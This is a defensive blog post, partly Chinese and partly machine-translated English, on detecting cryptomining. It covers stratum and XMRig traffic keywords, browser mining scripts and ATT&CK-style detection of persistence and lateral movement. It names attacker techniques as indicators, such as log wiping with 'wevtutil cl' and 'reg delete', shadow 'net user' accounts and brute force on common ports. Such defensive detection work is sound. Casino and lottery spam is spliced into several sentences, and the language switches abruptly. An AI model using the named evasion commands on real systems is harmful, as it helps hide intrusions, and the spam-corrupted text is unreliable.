网上对于挖矿的检测也有很多的专业文章，笔者在此就对网上的文章做一个汇总再加上自己的一些不太成熟的想法，欢迎各位师傅们的探讨，当然，检测的方法还是从2个方向出发，基于流量层的检测以及主机行为的检测一.流量特征

　　对于挖矿，我们最熟悉的协议就是以太坊stratum协议，当然笔者这里就不分析stratum协议了，我们来看看stratum协议的特征，这是常见的stratum协议

　　{“id”: 1, “method”: “mining.subscribe”, “params”: [“cpuminer/2.5.0″]}

　　通常包括关键字mining以及json格式这2点。

　　XMRig通信协议(jsonrpc)

　　我们防守方的检测规则，主要基于mining，jsonrpc，aseed_hash，job_id等一些敏感关键字的匹配，然后查看数据包是否为json格式，至于xml门罗币的检测，一般是有登陆包和提交包，我们可以关联一下这2个包，以至于减少误报率，主要匹配login，submit等关键字的匹配。

　　ps:我们也可以根据比特币钱包地址的前缀检测是否是存在挖矿行为，正如我们的银行卡招商，农业等不同银行的卡号有不同的特征二.威胁情报

　　配合各个威胁情报部门，收集标记矿场IP，域名通信地址，钱包地址，挖矿木马的HASH，加密流量指纹等信息

　　挖矿主要有基于被动和主动，主动好理解，就是被入侵了，被动是什么呢？就是浏览器挖矿一.前端浏览器挖矿（被动）

　　首先什么是浏览器挖矿，怎么理解，普通的挖矿木马则是基于消耗服务器cpu内存，而浏览器挖矿则是消耗浏览器内存进行挖矿，前者在于自己的设备上进行运算，后者在于其他用户访问了该页面，该页面存在xxx.js，就开始挖矿了，常见的为Coinhive脚本以及其他脚本

　　我们防守方的检测规则，主要基于常见浏览器挖矿脚本的名字正则匹配，md5，hash匹配，以及浏览器恶意占用内存以及持续性的某地址请求，恶意域名提前侦测。二.攻击链路检测（被入侵或者员工自己挖矿）

　　Pinpointing (web vulnerabilities, phishing) -> Mining malware self-start / hidden / maintaining privileges -> Mining malware laterally searching for more mining machines

　　The above is a relatively classic chain, we can detect these three points, how to pinpoint is not specifically introduced in this article.

　　Self-start (rc.local self-start on boot, crontabs scheduled tasks, malicious system service checkconfig, mac detection of these two directories (LaunchAgents, LaunchDaemons)) / hidden (modify filenames, modify process names (prctl), hide files), malware lateral movement (scanning ports, password brute force, and then executing self-start), mainly using ids traffic devices for inspection and detection. Then, how do these technologies correspond to the ATT&CK matrix diagram, and how do we achieve deep defensewebsite online casino online website and What is it? First, let’s look at the corresponding TID.

　　Let’s talk about it step by step. First is our information collection. This type of rule must be associated with CEP rules, otherwise, it will produce a lot of false positives. How to understand this? For example, if a company employee normally views the process list, tasklist /svc, we can’t report an error, can we? Our CEP associates it with previous operations, such as previous frenetic searches for folders, viewing the current user, then this employee may be at risk of being mined. The technical difficulty lies in the association of rules and the low accuracy of rules, with the purpose of preventing problems before they occur.

　　In this stage, we also need to pay special attention. First of all, the general scheduled tasks, taskschd (Windows), and crontabs on Linux/mac are worth our focus. We also need to check whether other js scripts are malicious. As for Linux machines, because some servers come with a Python environment, we need to pay special attention to the execution of Python files. Of course, third-party loading may be a loader.exe, remotely loading the mining malware.

　　Technical difficulties: 1lottery tutorialClick to enter. Using third-party or whitelist to load, in many cases, the attacker has obtained privileges but rarely runs the mining malware directly. They may drop a loader to load the malware or use some whitelist exploits of Windows to load our mining malware. How do we defend against this? First, the loader. We can use a domain whitelist, which means we isolate and prevent access to domains that are not our corporate domain or office domain. As for whitelist loading, we can also use terminal whitelist, where our rules only allow these dlls or exes to run. Of course, if it is difficult to implement domain whitelist, we should focus on external requests.

　　Maintaining privileges stage, self-start (sc), (rc.local, LaunchAgents, LaunchDaemons, etc.), scheduled tasks, registry (reg, requires elevation of privileges, relatively sensitive), shadow users (net user).

　　Defense avoidance stage: delete logs (history, del, sfc, rd, wevtutil cl, eventvwr, dumpel.exe, @reg delete Terminal Server ClientDefault” /va /f(rdp log)), hide files (attrib), modify process names (prctl), change file directory permissions (chmod), protocol confusion encoding (those encrypted can see who initiated them, and trusted ones can be allowed to pass through, others should be blocked)

　　Windows log location (Windows may not be listed):

　　Lateral movement stage: mining malware and manual lateral movement are basically based on simple weak passwords and simple port brute force attacks on ports such as 21, 22, 445, 3389. What we need to do is to close unused ports if they are not for business needs, as well as requirements for password policies and login restrictions.

　　A simple summary: for the detection of the attack chain, we still need to focus on the four stages of execution, permission maintenance, defense avoidance, and lateral movement, as these four stages have relatively sensitive and obvious characteristics. As for the information collection end, we associate related strategies. Of course, when it comes to this, the author also has some immature opinions. To make the defense impermeable, at least in the current situation, it is impossible. The key to improving the quality of defense lies in whether we can grasp the initiative. Where does the initiative of our defense side lie? It lies in the unknown of the attacker to our environment, our architecture, and our defense line. For example, the same command ipconfig can also achieve the same effect with different command transformations. Then executing the former is dangerous, and executing the latter is safe. Of course, this is just a thought. How to make this thought more active depends on the readers’ own efforts.

　　We can usually use top to view commands with high CPU usage (in Windows, use wmic cpu get loadpercentage or check the Task Manager), netstat -ano to check for external IP addresses, ip can be checked with Weibo, history of executed commands (in Windows, check the logs), ps -ef to view processes (in Windows, it is tasklist /svc), followed by searching for backdoor files. In Windows, we mainly focus on the registry, hidden users, backdoors of web services, scheduled tasks, and common backdoors such as startup. In Linux, we mainly focus on scheduled tasks, whether SSH has been hijacked, startup automatically, etc. As for tracing the source, we find the miner pool IP or wallet address, and the methods and tools used by the attacker to break in, to see if we can analyze relevant information.

　　With the escalation of offensive and defensive confrontation, more and more technologies need to be learned. The offensive and defensive confrontation in the cloud, the study of algorithms, rough writing, if there are any errors, please correct them at your discretion.